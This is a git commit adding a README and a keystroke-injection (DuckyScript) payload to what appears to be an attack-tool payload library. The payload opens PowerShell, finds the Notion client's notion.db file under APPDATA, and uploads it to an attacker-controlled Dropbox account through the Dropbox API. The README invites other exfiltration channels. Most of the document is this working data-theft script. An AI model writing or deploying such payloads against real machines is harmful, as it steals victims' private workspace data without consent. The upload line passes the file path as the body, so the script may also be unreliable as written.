Merge pull request #173 from aleff-github/patch-40

Exfiltrates the entire database of the Notion client
2023-06-12 14:02:57 -04:00 · 2023-06-12 14:02:57 -04:00 · 911d1e956a
parent c0c5eb82c3 4f7713cda7
commit 911d1e956a
2 changed files with 68 additions and 0 deletions
--- a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md
+++ b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md
@ -0,0 +1,22 @@
+# Exfiltrates the entire database of the Notion client
+
+This script can be used to exfiltrate the entire Notion database and thus all client-level content of your Notion account.
+
+**Category**: Exfiltration
+
+## Description
+
+This script can be used to exfiltrate the entire Notion database and thus all client-level content of your Notion account.
+
+Open a PowerShell, the get dinamically the Notion full-path and then add the `notion.db` string. Then create all the needed variables for the exfiltration and then send it trough Dropbox. I used Dropbox but you can use whatever you want.
+
+## Dependencies
+
+* Notion must be installed
+* Internet Connection
+
+## Settings
+
+- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
+
+`DEFINE DROPBOX_ACCESS_TOKEN "example"`
--- a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt
+++ b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt
@ -0,0 +1,46 @@
+REM #########################################################################
+REM #                                                                       |
+REM # Title        : Exfiltrates the entire database of the Notion client   |
+REM # Author       : Aleff                                                  |
+REM # Version      : 1.0                                                    |
+REM # Category     : Exfiltration                                           |
+REM # Target       : Windows 10-11                                          |
+REM #                                                                       |
+REM #########################################################################
+
+
+REM Requirements:
+REM     - Notion must be installed
+REM     - Internet Connection
+
+
+REM You must define your Dropbox accessToken or modify the exfiltration modality.
+DEFINE #DROPBOX_ACCESS_TOKEN example
+
+GUI r
+DELAY 1000
+STRING PowerShell
+ENTER
+DELAY 2000
+
+REM Setting about exfiltration
+STRINGLN $accessToken = "#DROPBOX_ACCESS_TOKEN"
+
+REM Settings about Notion DB
+STRINGLN_BLOCK
+    $NotionPath = Join-Path -Path $env:APPDATA -ChildPath 'Notion' 
+    $NotionDatabasePath = Join-Path -Path $NotionPath -ChildPath "notion.db"
+
+    $authHeader = @{Authorization = "Bearer $accessToken"}
+
+    $uploadUrl = "https://content.dropboxapi.com/2/files/upload"
+
+    $dropboxFilePath = "/notion.db"
+
+    $headers = @{}
+    $headers.Add("Authorization", "Bearer $accessToken")
+    $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
+    $headers.Add("Content-Type", "application/octet-stream")
+
+    Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $NotionDatabasePath; exit;
+END_STRINGLN